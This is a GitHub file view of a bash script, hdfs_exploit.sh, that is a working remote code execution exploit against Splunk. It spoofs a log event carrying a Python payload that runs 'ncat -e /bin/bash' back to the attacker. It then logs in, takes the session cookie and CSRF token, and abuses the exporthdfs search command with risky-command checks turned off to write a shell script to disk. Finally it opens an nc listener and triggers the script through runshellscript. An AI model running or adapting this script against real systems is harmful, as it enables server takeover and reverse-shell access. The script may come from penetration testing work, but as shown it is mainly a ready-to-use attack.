-
Notifications
You must be signed in to change notification settings - Fork 3
Expand file tree
/
Copy pathhdfs_exploit.sh
More file actions
70 lines (60 loc) · 3.26 KB
/
hdfs_exploit.sh
File metadata and controls
70 lines (60 loc) · 3.26 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
#!/bin/bash
# @(#) s1
#settings
rhost="127.0.0.1"
rport="8000"
lhost="127.0.0.1"
lport="4444"
proto="http"
uname="user" # change this
passw="testpass" # change this
marker="B44D3V3NT" # string used to search for payload event in splunk
if [[ "$proto" == "https" ]]
then
ssl="--insecure"
else
ssl=""
fi
scanhost=""
spoofhost="YES"
while getopts h:p:l:s:o:m:ce option
do
case "${option}"
in
h) rhost=${OPTARG};;
p) rport=${OPTARG};;
l) lhost=${OPTARG};;
s) lport=${OPTARG};;
o) proto=${OPTARG};;
m) marker=${OPTARG};;
u) uname=${OPTARG};;
w) passw=${OPTARG};;
c) scanhost="-c";;
e) spoof="NO";;
esac
done
# spoofing a path traversal event through open indexer (see spooforward.py)
# you may want to replace payload (maxlen == 255)
if [[ "$spoofhost" == "YES" ]]
then
./spooforward.py ${scanhost} -d -r ${rhost} -l .. -i main -t . -s . -m "#!/usr/bin/python
import os;os.system('ncat -e /bin/bash ${lhost} ${lport}');# ${marker} "
fi
#get cookie
cookie=$(curl ${ssl} -v -b 'cval=1479575274; splunkweb_uid=5D9DD94C-283A-4A2A-86E4-4E5C5AAF4C57; session_id_8000=4b1936d83bf88c5fe3e06409a5c5c751e51aa1f4' -d "cval=1479575274&username=${uname}&password=${passw}&set_has_logged_in=false" "${proto}://${rhost}:${rport}/en-US/account/login" 2>&1 | grep Set-Cookie | awk '{print $3}' | tr '\n' ' ')
#get csrf
csrf=$( echo $cookie | tr "=" " " | awk '{print $4}' | tr -d ';')
#get sessionid
sid=$( curl ${ssl} -v -H "X-Splunk-Form-Key: ${csrf}; X-Requested-With: XMLHttpRequest" -b "${cookie}" "${proto}://${rhost}:${rport}/en-US/app/launcher" 2>&1 | grep Set-Cookie | awk '{print $3}' )
#export hdfs to file
curl ${ssl} -s -H "X-Splunk-Form-Key: ${csrf}" -H "X-Requested-With: XMLHttpRequest" -b "${sid} ${cookie}" -d "rf=*&auto_cancel=30&status_buckets=300&output_mode=json&custom.search=${marker}+host%3D%22..%22+%7C+exporthdfs+basefilename%3D%22shell%22+dst%3Dfile%3A%2F%2F%2Fopt%2Fsplunk%2Fbin%2Fscripts%2Fpentest+compress%3D0&search=search+${marker}+host%3D%22..%22+%7C+exporthdfs+basefilename%3D%22shell%22+dst%3Dfile%3A%2F%2F%2Fopt%2Fsplunk%2Fbin%2Fscripts%2Fpentest+compress%3D0&earliest_time=&latest_time=&ui_dispatch_app=search&preview=1&adhoc_search_level=smart&indexedRealtime=&sample_ratio=1&check_risky_command=false&provenance=UI%3ASearch" "${proto}://${rhost}:${rport}/en-US/splunkd/__raw/servicesNS/${uname}/search/search/jobs" >/dev/null
sleep 2
set -m
# SMALL PAYLOAD BRUTE
echo -e "[PWN] \033[31mWaiting for shell...\033[0m"
nc -lvp${lport} & sleep 1
for i in {0..5}
do
curl ${ssl} -s -H "X-Splunk-Form-Key: $csrf" -H "X-Requested-With: XMLHttpRequest" -b "${sid} ${cookie}" -d "rf=*&auto_cancel=30&status_buckets=300&output_mode=json&custom.display.page.search.mode=smart&custom.dispatch.sample_ratio=1&custom.display.general.type=statistics&custom.search=%7C+runshellscript+shell_${i}_0.hdfs+x+x+x+x+x+x+x+x+x+x+&custom.dispatch.earliest_time=&custom.dispatch.latest_time=&search=%7C+runshellscript+shell_${i}_0.hdfs+x+x+x+x+x+x+x+x+x+x+&earliest_time=&latest_time=&ui_dispatch_app=search&preview=1&adhoc_search_level=smart&indexedRealtime=&sample_ratio=1&check_risky_command=false&provenance=UI%3ASearch" "${proto}://${rhost}:${rport}/en-US/splunkd/__raw/servicesNS/${uname}/search/search/jobs" >/dev/null
done
fg